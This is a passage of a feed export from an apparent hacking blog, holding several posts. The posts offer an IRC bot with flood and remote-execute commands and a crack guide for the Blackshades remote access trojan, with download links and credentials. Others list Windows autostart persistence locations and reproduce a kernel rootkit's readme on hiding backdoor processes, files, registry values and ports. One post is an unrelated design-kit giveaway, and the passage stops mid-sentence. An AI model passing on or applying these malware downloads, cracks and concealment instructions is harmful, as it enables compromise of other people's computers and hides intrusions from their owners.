Injects into explorer.exe if x86&lt;br /&gt;
Copies to %appdata% and Creates Startup Reg key&lt;br /&gt;
Backup DNS&lt;br /&gt;
Mutex&lt;br /&gt;
Auth Host&lt;br /&gt;
&lt;br /&gt;
Commands:&lt;br /&gt;
.kill  - Terminates it&#39;s own process&lt;br /&gt;
.execute &amp;lt;ip/dns&amp;gt; &amp;lt;name&amp;gt;&lt;br /&gt;
.udp &amp;lt;ip/dns&amp;gt; &amp;lt;time&amp;gt;&lt;br /&gt;
.http &amp;lt;ip/dns&amp;gt; &amp;lt;time&amp;gt;&lt;br /&gt;
.version&lt;br /&gt;
.remove&lt;br /&gt;
.update &amp;lt;ip/dns&amp;gt; &amp;lt;time&amp;gt;&lt;br /&gt;
.visit &amp;lt;ip/dns&amp;gt; &lt;br /&gt;
.dotnet &amp;lt;#chan&amp;gt;  - If it has dotnet install it joins specified channel &lt;br /&gt;
.join &amp;lt;#chan&amp;gt;&lt;br /&gt;
.part&lt;br /&gt;
.recon  -  Reconnects to channel after 2 minutes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/5onWN&quot; target=&quot;_blank&quot;&gt;Download:&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://lastfrag.com/files/Silly%20Bot%201.3.2.zip&quot; target=&quot;_blank&quot;&gt;&lt;/a&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/3478984063221008834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/02/silly-bot-132-c-irc-bot-new-bugs-fixed.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3478984063221008834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3478984063221008834'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/02/silly-bot-132-c-irc-bot-new-bugs-fixed.html' title='Silly Bot 1.3.2 - C++ IRC Bot - New: Bugs Fixed from 1.3'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-3168049673414294377</id><published>2012-02-15T07:12:00.000-08:00</published><updated>2012-02-16T03:43:49.080-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Free Download"/><category scheme="http://www.blogger.com/atom/ns#" term="Misc"/><title type='text'>Facebook Timeline Cover Designs KIT! Free PSD File!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUbdINu5etRRaN8ds82x0kmGfb17GvBtgSozIlVD2wrjTXiG6X_1L238mrnTe8hu852lauQ36Mf7K0QmqijiVreTN0zPmLhHczW6m2qya74fSoajNdN9u4mo3W6guywka4h7dQHIYECrY/s1600/facebook_timeline_kit_by_survivorcz-d4muuob.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUbdINu5etRRaN8ds82x0kmGfb17GvBtgSozIlVD2wrjTXiG6X_1L238mrnTe8hu852lauQ36Mf7K0QmqijiVreTN0zPmLhHczW6m2qya74fSoajNdN9u4mo3W6guywka4h7dQHIYECrY/s1600/facebook_timeline_kit_by_survivorcz-d4muuob.jpg&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
Facebook Timeline Cover Designs Collection By Survivor&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
Facebook Timeline KIT is kit with 100s of possible design 
combinations. All elements are vectors or shapes and You can Scale or 
rotate it.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h5&gt;



Facebook Timeline KIT - Features&lt;/h5&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;88 independant parts which can be utterly combined&lt;/li&gt;
&lt;br /&gt;
&lt;li&gt;Almost unlimited combinations&lt;/li&gt;
&lt;br /&gt;
&lt;li&gt;All Elements are easy to move, rotate and customize&lt;/li&gt;
&lt;br /&gt;
&lt;li&gt;Easy to change, enable or dissable every part of the Facebook Timeline&lt;/li&gt;
&lt;br /&gt;
&lt;li&gt;1 PSD File – very well organized with color coded Folders&lt;/li&gt;
&lt;br /&gt;
&lt;li&gt;PSD is ready to be saved as .jpg and uploaded to your Facebook Profile - 850 x 315 px&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://adf.ly/5VcHX&quot; target=&quot;_blank&quot;&gt;&lt;b&gt;Download&amp;nbsp; &lt;/b&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/3168049673414294377/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/02/facebook-timeline-designs-kit-free-psd.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3168049673414294377'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/3168049673414294377'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/02/facebook-timeline-designs-kit-free-psd.html' title='Facebook Timeline Cover Designs KIT! Free PSD File!'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUbdINu5etRRaN8ds82x0kmGfb17GvBtgSozIlVD2wrjTXiG6X_1L238mrnTe8hu852lauQ36Mf7K0QmqijiVreTN0zPmLhHczW6m2qya74fSoajNdN9u4mo3W6guywka4h7dQHIYECrY/s72-c/facebook_timeline_kit_by_survivorcz-d4muuob.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-7001884529966994170</id><published>2012-01-08T01:55:00.000-08:00</published><updated>2012-01-08T02:07:09.731-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tools And Programs"/><category scheme="http://www.blogger.com/atom/ns#" term="malware"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote Adminstration Tool"/><title type='text'>Bullshit rat cracked 4.7.1</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6ejfFM34JJA6-rRbYJO0SE9cYhennvu7f2AKbEKyYwDdyBOqlKyjdarfLHIqPmzNbuqNkTIf7Au_QHbyTW37caAqSNXgv-vQLKeyo-wmusVYd_QV8d7uNpsdxbX7rSiEvR1QXCXGOxXc/s1600/Trojan_Horse_by_RiTz21.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;220&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6ejfFM34JJA6-rRbYJO0SE9cYhennvu7f2AKbEKyYwDdyBOqlKyjdarfLHIqPmzNbuqNkTIf7Au_QHbyTW37caAqSNXgv-vQLKeyo-wmusVYd_QV8d7uNpsdxbX7rSiEvR1QXCXGOxXc/s320/Trojan_Horse_by_RiTz21.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;beware!!&lt;/b&gt;&lt;br /&gt;
&lt;u&gt;copied post from HF&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;bbcode_container&quot;&gt;
&lt;div class=&quot;bbcode_quote&quot;&gt;
&lt;div class=&quot;quote_container&quot;&gt;
**&lt;br /&gt;
**&lt;br /&gt;
** Blackshades 3.0~4.8 crack **&lt;br /&gt;
**  **&lt;br /&gt;
** BY SRBIN!!!  **&lt;br /&gt;
**  **&lt;br /&gt;
** Tested with version 4.7.1 **&lt;br /&gt;
**&lt;br /&gt;
**&lt;br /&gt;
**&lt;br /&gt;
MANUAL &lt;a href=&quot;http://pastebin.com/PqeYuqAx&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://pastebin.com/PqeYuqAx&lt;/a&gt;&lt;br /&gt;
DOWNLOAD THIS &lt;a href=&quot;http://www.multiupload.com/R8ZG4OC7IU&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.multiupload.com/R8ZG4OC7IU&lt;/a&gt;&lt;br /&gt;
Download &lt;a href=&quot;http://www.apachefriends.org/en/xampp-windows.html&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://www.apachefriends.org/en/xampp-windows.html&lt;/a&gt;&lt;br /&gt;
Download &lt;a href=&quot;http://bshades.eu/4.7.1.rar&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://bshades.eu/4.7.1.rar&lt;/a&gt; password for the archive is blackshades&lt;br /&gt;
Download &lt;a href=&quot;http://bshades.eu/HWID.exe&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://bshades.eu/HWID.exe&lt;/a&gt;&lt;br /&gt;
Download and install MySQL ODBC connector from here &lt;a href=&quot;http://dev.mysql.com/downloads/connector/odbc&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://dev.mysql.com/downloads/connector/odbc&lt;/a&gt;&lt;br /&gt;
I suggest you to go with older XAMPP 1.6.x because you will need VC++2008 redist or later to set leatest version to run.&lt;br /&gt;
Add the following line in &quot;hosts&quot; file located here C:\WINDOWS\system32\drivers\etc&lt;br /&gt;
127.0.0.1 blackshades.ru&lt;br /&gt;
**&lt;br /&gt;
MySQL database details to set:&lt;br /&gt;
Username: root&lt;br /&gt;
Password: Uh77yerJ83nX&lt;br /&gt;
Create database named -&amp;gt; bss_net&lt;br /&gt;
bss_net is the database necessary for rat to authenticate;&lt;br /&gt;
Create database named -&amp;gt; bs_fusion&lt;br /&gt;
Create database named -&amp;gt; bs_proxy&lt;br /&gt;
Creation of these two database will prevent error boxes, i didn&#39;t provided table structure because they are not needed for rat. &lt;br /&gt;
Import the database backup files provided for each database respectively.&lt;br /&gt;
**&lt;br /&gt;
Run HWID.exe and go to database bss_net in table accounts and replace 
hwid column value of -11 with generated one (just paste it)&lt;br /&gt;
Start file server4.7.1 (login server)&lt;br /&gt;
**&lt;br /&gt;
Start Blackshades RAT 4.7.1 (client.exe) and login with username -&amp;gt; srbin and password -&amp;gt; krek if needed&lt;br /&gt;
**&lt;br /&gt;
For RAT version 4.8:&lt;br /&gt;
Download this and install &lt;a href=&quot;http://sourceforge.net/projects/pjs-passport/&quot; target=&quot;_blank&quot; xpndit=&quot;true&quot;&gt;http://sourceforge.net/projects/pjs-passport/&lt;/a&gt;&lt;br /&gt;
forward these ports using TCP protocol:&lt;br /&gt;
127.0.0.1:8203 ==&amp;gt; 127.0.0.1:8201&lt;br /&gt;
127.0.0.1:8204 ==&amp;gt; 127.0.0.1:8202&lt;br /&gt;
**&lt;br /&gt;
For older version:&lt;br /&gt;
DB password is the same, its just port forwarding that is necessary but I might release all login servers.&lt;br /&gt;
Only 4.8 has different database password but like described before, it 
can be bypassed with port forwarding, use netsat to examine in details.
   
  &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/7001884529966994170/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/01/bullshit-rat-cracked-471.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/7001884529966994170'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/7001884529966994170'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/01/bullshit-rat-cracked-471.html' title='&lt;R.A.T&gt;Bullshit rat cracked 4.7.1'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6ejfFM34JJA6-rRbYJO0SE9cYhennvu7f2AKbEKyYwDdyBOqlKyjdarfLHIqPmzNbuqNkTIf7Au_QHbyTW37caAqSNXgv-vQLKeyo-wmusVYd_QV8d7uNpsdxbX7rSiEvR1QXCXGOxXc/s72-c/Trojan_Horse_by_RiTz21.jpg" height="72" width="72"/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-8324506959100531198</id><published>2012-01-08T01:15:00.000-08:00</published><updated>2012-01-08T01:15:23.480-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Misc"/><title type='text'>All Known and Unknown Autostart Methods In Windows</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6t9gfiYupu6tReEsPIbRs8ioWs06ADmfUfAt_e5eqytK9HFDny7M0PsFAZnc7NDMijdZoAPyH8U5pvv8tZGlFlyIrGNfyrTskUmnUSQ1AUhLd9eSQBuBzD-Ylju24pjAVAYTQOevlAYw/s1600/autorun.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6t9gfiYupu6tReEsPIbRs8ioWs06ADmfUfAt_e5eqytK9HFDny7M0PsFAZnc7NDMijdZoAPyH8U5pvv8tZGlFlyIrGNfyrTskUmnUSQ1AUhLd9eSQBuBzD-Ylju24pjAVAYTQOevlAYw/s1600/autorun.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;
&lt;pre&gt;&amp;nbsp;&lt;/pre&gt;
&lt;pre&gt;1. Autostart folder
   Everything in here will restart.
   C:\windows\start menu\programs\startup {english}
   C:\windows\Menu Démarrer\Programmes\Démarrage {french}
   This Autostart Directory is saved in    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
   Folders Startup=&quot;C:\windows\start menu\programs\startup&quot; 
   &#39;So it could be easily changed by any program.

2. Win.ini
   [windows]
   load=file.exe
   run=file.exe

3. System.ini [boot]
   Shell=Explorer.exe file.exe

4. c:\windows\winstart.bat
   &#39;Note behaves like an usual BAT file. Used for copying deleting specific files. Autostarts
    everytime

5. Registry
   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
   [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]

6. c:\windows\wininit.ini
   &#39;Often Used by Setup-Programs when the file exists it is run ONCE and then is deleted by     windows
    Example: (content of wininit.ini)
    [Rename]
    NUL=c:\windows\picture.exe
    &#39;This example sends c:\windows\picture.exe to NUL, which means that it is deleted. This
    requires no interactivity with the user and runs totaly stealth.

7. Autoexec.bat
   Starts everytime at Dos Level.
                                                              
8. Registry Shell Spawning
   [HKEY_CLASSES_ROOT\exefile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_CLASSES_ROOT\comfile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_CLASSES_ROOT\batfile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_CLASSES_ROOT\piffile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @=&quot;\&quot;%1\&quot; %*&quot;
   [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @=&quot;\&quot;%1\&quot; %*&quot;
     
   The key should have a value of Value &quot;%1 %*&quot;, if this is changed to &quot;server.exe %1 %*&quot;,
   the server.exe is executed EVERYTIME an exe/pif/com/bat/hta is executed.
   Known as Unkown Starting Method and is currently used by Subseven.

 9. Icq Inet
   [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
   &quot;Path&quot;=&quot;test.exe&quot;
   &quot;Startup&quot;=&quot;c:\\test&quot;
   &quot;Parameters&quot;=&quot;&quot;
   &quot;Enable&quot;=&quot;Yes&quot;

   [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\
   This key includes all the APPS which are executed IF ICQNET Detects an Internet Connection.

9. Misc Information
   [HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] 
   @=&quot;Scrap object&quot; &quot;NeverShowExt&quot;=&quot;&quot;
                                                              
   The NeverShowExt key has the function to HIDE the real extension of the file (here) SHS.
   This means if you rename a file as &quot;Girl.jpg.shs&quot; it displays as &quot;Girl.jpg&quot; in all programs
   including Explorer.
   Your registry should be full of NeverShowExt keys, simply delte the key to get the real
   extension to show up.
_____________________________________________________________________________________________&lt;/pre&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://openhacking.blogspot.com/feeds/8324506959100531198/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://openhacking.blogspot.com/2012/01/all-known-and-unknown-autostart-methods.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8324506959100531198'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2112164836966994080/posts/default/8324506959100531198'/><link rel='alternate' type='text/html' href='http://openhacking.blogspot.com/2012/01/all-known-and-unknown-autostart-methods.html' title='All Known and Unknown Autostart Methods In Windows'/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6t9gfiYupu6tReEsPIbRs8ioWs06ADmfUfAt_e5eqytK9HFDny7M0PsFAZnc7NDMijdZoAPyH8U5pvv8tZGlFlyIrGNfyrTskUmnUSQ1AUhLd9eSQBuBzD-Ylju24pjAVAYTQOevlAYw/s72-c/autorun.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2112164836966994080.post-3036422635459530554</id><published>2012-01-04T05:55:00.000-08:00</published><updated>2012-01-04T06:00:59.579-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Malware Source"/><title type='text'>[Malware Source]Agony ring0 rootkit!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h2 class=&quot;title icon&quot; style=&quot;text-align: center;&quot;&gt;


     Agony ring0 rootkit
    &lt;/h2&gt;
&lt;div id=&quot;post_message_11500&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz2eKqHQe1sRUYwGKkuY-VPolfYDEo9CUWAfUNKS0aYDdkkdJ83w354nPnzPgsbWPZn1g56gZ691r0oKGvKrPt_oiABQBJuChH7nimsimtZvaWJFWp8sMZf6JQ4lpSo3pQUG9mtH6Dc9c/s1600/RootkitVid.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot; xpndit=&quot;true&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;153&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz2eKqHQe1sRUYwGKkuY-VPolfYDEo9CUWAfUNKS0aYDdkkdJ83w354nPnzPgsbWPZn1g56gZ691r0oKGvKrPt_oiABQBJuChH7nimsimtZvaWJFWp8sMZf6JQ4lpSo3pQUG9mtH6Dc9c/s400/RootkitVid.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;postcontent restore &quot;&gt;
&lt;b&gt;Name&lt;/b&gt;     Agony ring0 rootkit &lt;br /&gt;
&lt;b&gt;Author&lt;/b&gt;    Intox&lt;br /&gt;
&lt;b&gt;Complier &lt;/b&gt;C++ &lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;Description&lt;/b&gt;&lt;/span&gt;&lt;/u&gt;
&lt;br /&gt;
from the readme&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;bbcode_container&quot;&gt;
&lt;div class=&quot;bbcode_quote&quot;&gt;
&lt;div class=&quot;quote_container&quot;&gt;
A. Before starting&lt;br /&gt;
&lt;br /&gt;
We all know that some security applications aren&#39;t compatible, there may
 be conflicts between them. For instance, the installation of two recent
 different firewalls &lt;br /&gt;
isn&#39;t recommended. &lt;br /&gt;
Why? Because those tools hook native APIs at kernel mode level (on the  &lt;br /&gt;
SSDT) and then, when two tools want to hook the same API, there is a 
conflit. By starting &amp;amp; stopping them, we can easily provoke a blue 
screen.&lt;br /&gt;
&lt;br /&gt;
As previously said, This tool can conflict with some security tools, like process guard. &lt;br /&gt;
So i advise you to read the readme before you use it, and at least to look how to uninstall it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I. THE TOOL&lt;br /&gt;
&lt;br /&gt;
1.1 What use is it ?&lt;br /&gt;
&lt;br /&gt;
Agony is a rootkit for Windows 2000 and superiors, able to falsify data 
returned by the Windows APIs. It can make files and applications 
invisible on a windows system.&lt;br /&gt;
&lt;br /&gt;
1.2 why &quot;Agony&quot; ? &lt;br /&gt;
&lt;br /&gt;
why not ? 
&lt;br /&gt;
1.3 Ring what ?&lt;br /&gt;
&lt;br /&gt;
Under Windows, the applications run under 2 modes: ring3 and ring0, also
 called respectively user mode and kernel mode. The kernel mode is lower
 a mode than the user one, wich is the one you usually run under. That 
means that all the calls made from user mode will interact with kernel 
level to be executed. &lt;br /&gt;
The utility of a kernel mode rootkit is that security tools, working with the user mode, will not notice anything.     &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1.4 how is it made ?&lt;br /&gt;
&lt;br /&gt;
it is fully coded in C. The rootkit is made of 2 parts: the driver, 
which runs in kernel mode, and the .exe, which runs in user-mode, it 
installs the driver and launches commands.&lt;br /&gt;
Compile the driver with the DDK, and the .exe with any compiler (including some kernel libraries). I made it with Dev-c++.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1.5 Cool ! This can be usefull 
&lt;br /&gt;
&lt;br /&gt;
This tool was created in order to familiarize myself with ring0. It&#39;s for educationnal purpose, and that&#39;s why it&#39;s open source.&lt;br /&gt;
You will be the only one responsible for the use you make of it. In 
other words, use it at your own risks, I would also decline any 
responsibility of materials or software damage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
II. THE OPTIONS&lt;br /&gt;
&lt;br /&gt;
Launch the program without arguments to view a small description of Agony features.&lt;br /&gt;
Take care, before using them, that this tool is case sensitive.&lt;br /&gt;
for instance: agony -p opera.exe will NOT hide Opera.exe process.&lt;br /&gt;
Also note that you have to use quotes to hide object with spaces in their names.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.1 hide a process&lt;br /&gt;
&lt;br /&gt;
cmdline: agony -p process_name.exe&lt;br /&gt;
&lt;br /&gt;
All processes named &quot;process_name.exe&quot; will be hidden.&lt;br /&gt;
Note that agony doesn&#39;t prevent access to this process, it just hides it from listing APIs.&lt;br /&gt;
example : you can kill this process with his PID, even hidden.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.2 hide a dir/file&lt;br /&gt;
&lt;br /&gt;
cmdline: Agony -f dir_or_file_name&lt;br /&gt;
&lt;br /&gt;
The hidden file/dir will be not shown in file listings too (eg : explorer).&lt;br /&gt;
The content of a hidden dir will not appear on windows research, even if
 they&#39;re not hidden. You can access a hidden dir if you know the path:&lt;br /&gt;
For example, you can access C:\hidden_dir after a &quot;agony -f hidden_dir&quot;,
 just by typing &quot;C:\hidden_dir&quot; in the explorer address bar.&lt;br /&gt;
All files/dir with the same name will be hidden, so don&#39;t try to hide a file named &quot;system32&quot; 
&lt;br /&gt;
&lt;br /&gt;
2.3 hide a reg key/value&lt;br /&gt;
&lt;br /&gt;
Agony can falsify the reg base.&lt;br /&gt;
&lt;br /&gt;
cmdline: agony -k reg_key: hide a reg key &lt;br /&gt;
agony -v reg_value: hide a reg value (wow, seriously ?)&lt;br /&gt;
&lt;br /&gt;
Once again, only listing are falsified, the key/values are accessible.&lt;br /&gt;
For exemple: if you create a key &quot;hide this shit&quot; with value 
&quot;C:\start.exe&quot; into Windows\CurrentVersion\Run registry key, you can 
hide it by launching agony -v &quot;hide this shit&quot;. Furthermore, 
C:\start.exe will be launched at startup 
&lt;br /&gt;
&lt;br /&gt;
2.4 Hide a TCP/UDP connexion&lt;br /&gt;
&lt;br /&gt;
w00t, you can hide connexions &amp;lt;8-)&lt;br /&gt;
cmdline: agony -tcp num_port.&lt;br /&gt;
agony -udp num_port.&lt;br /&gt;
You can use tools like fport to see wich ports are opened by an application you want to hide, and use agony to hide it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.5 Hide a sercice&lt;br /&gt;
&lt;br /&gt;
cmdline: agony -s service_name.&lt;br /&gt;
&lt;br /&gt;
Be aware of the fact that service_name is the recording name of the service, not the display name showed by the SC manager. &lt;br /&gt;
Here, it works a little bit differently: we have to fetch the list of 
services in the service.exe process memory to find the service to hide, 
and hide it.&lt;br /&gt;
Hidden services will not be accessible anymore.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.6 Falsify the remaining disk space&lt;br /&gt;
&lt;br /&gt;
-space option allow you to falsify the remaining space disk on a volume.&lt;br /&gt;
If you got 300Mb free on C:\, D:\ and E:\ volume, and you launch:&lt;br /&gt;
cmdline: agony -space C:500 D:1000 E:3000&lt;br /&gt;
Windows will tell you that you have 800Mb free on C:\, 1300 on D:\ and 3300 on E:\&lt;br /&gt;
w00t, isn&#39;t it ? You can now hide your 30 GB of pr0n.&lt;br /&gt;
If you launch &quot;agony -space C:500&quot; and then &quot;agony -space C:800&quot;, there 
will be only 800 Mb added to the real remaining space disk.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2.7 Survive to reboot&lt;br /&gt;
&lt;br /&gt;
The -r option allows agony to survive a reboot.&lt;br /&gt;
All the cmdline containing the -r option will be launched at the start of the computer. &lt;br /&gt;
&quot;agony -p backdoor.exe -f backdoor.exe -space C:500 -s backdoor -tcp 88 -udp 5900 -v launchBackdoor -r&quot; will, on startup:&lt;br /&gt;
